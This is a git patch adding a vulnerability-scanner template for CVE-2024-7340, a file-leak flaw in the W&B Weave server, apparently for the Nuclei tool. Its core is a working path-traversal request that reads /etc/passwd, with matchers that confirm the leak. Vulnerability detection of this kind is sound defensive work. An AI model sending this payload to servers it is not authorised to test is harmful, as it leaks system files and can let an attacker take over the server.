From 43e7e45180ccbac5df54b87c0f23bddc606d3006 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Thu, 1 Aug 2024 19:10:00 +0530
Subject: [PATCH] Create CVE-2024-7340.yaml

---
 http/cves/2024/CVE-2024-7340.yaml | 46 +++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-7340.yaml

diff --git a/http/cves/2024/CVE-2024-7340.yaml b/http/cves/2024/CVE-2024-7340.yaml
new file mode 100644
index 0000000000..3af097a17c
--- /dev/null
+++ b/http/cves/2024/CVE-2024-7340.yaml
@@ -0,0 +1,46 @@
+id: CVE-2024-7340
+
+info:
+  name: W&B Weave Server - Remote Arbitrary File Leak
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: high
+  description: |
+    The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.
+  reference:
+    - https://github.com/advisories/GHSA-r49h-6qxq-624f
+    - https://github.com/wandb/weave/pull/1657
+    - https://research.jfrog.com/vulnerabilities/wandb-weave-server-remote-arbitrary-file-leak-jfsa-2024-001039248/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2024-7340
+    epss-score: 0.00043
+    epss-percentile: 0.09404
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2024,lfr,weave,wandb
+
+http:
+  - raw:
+      - |
+        GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+          - "filename=passwd"
+        condition: and
+
+      - type: status
+        status:
+          - 200